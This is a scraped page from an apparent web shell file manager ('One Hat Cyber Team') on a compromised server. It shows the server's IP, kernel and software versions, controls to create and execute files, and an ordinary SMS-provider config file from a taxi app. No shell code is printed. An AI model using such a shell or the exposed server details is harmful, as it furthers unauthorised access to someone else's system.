⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.101
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Server Software:
Apache/2.4.62 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.25
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
id
/
taxi.dev-unit.com
/
config
/
View File Name :
sms.php
<?php // The default SMS Sender ID to use when one is not provided. $defaultSenderId = 'WE3'; return [ /* |-------------------------------------------------------------------------- | Default SMS Provider |-------------------------------------------------------------------------- | | The default provider to use. | | Supported: "smsindiahub", "msg91", "trap", "log" | */ 'default' => env('SMS_PROVIDER', 'log'), /* |-------------------------------------------------------------------------- | Max Message Limit |-------------------------------------------------------------------------- | | The maximum character limit allowed when sending messages. | | Number of SMS | Max length | ------------- ---------- | 1 | 160 | 2 | 306 | 3 | 459 | 4 | 612 | */ 'message_limit' => 306, /* |-------------------------------------------------------------------------- | SMS Providers |-------------------------------------------------------------------------- | | The available SMS providers. | */ 'providers' => [ 'smsindiahub' => [ 'class' => \App\Base\Libraries\SMS\Providers\SMSIndiaHub::class, 'username' => env('SMSINDIAHUB_USERNAME'), 'password' => env('SMSINDIAHUB_PASSWORD'), 'sender_id' => env('SMS_SENDER_ID', $defaultSenderId), ], 'msg91' => [ 'class' => \App\Base\Libraries\SMS\Providers\MSG91::class, 'authkey' => env('MSG91_AUTH_KEY'), 'sender_id' => env('SMS_SENDER_ID', $defaultSenderId), ], 'trap' => [ 'class' => \App\Base\Libraries\SMS\Providers\SMSTrap::class, 'email' => env('SMS_TRAP_EMAIL'), ], 'log' => [ 'class' => \App\Base\Libraries\SMS\Providers\SMSLog::class, ], ], ];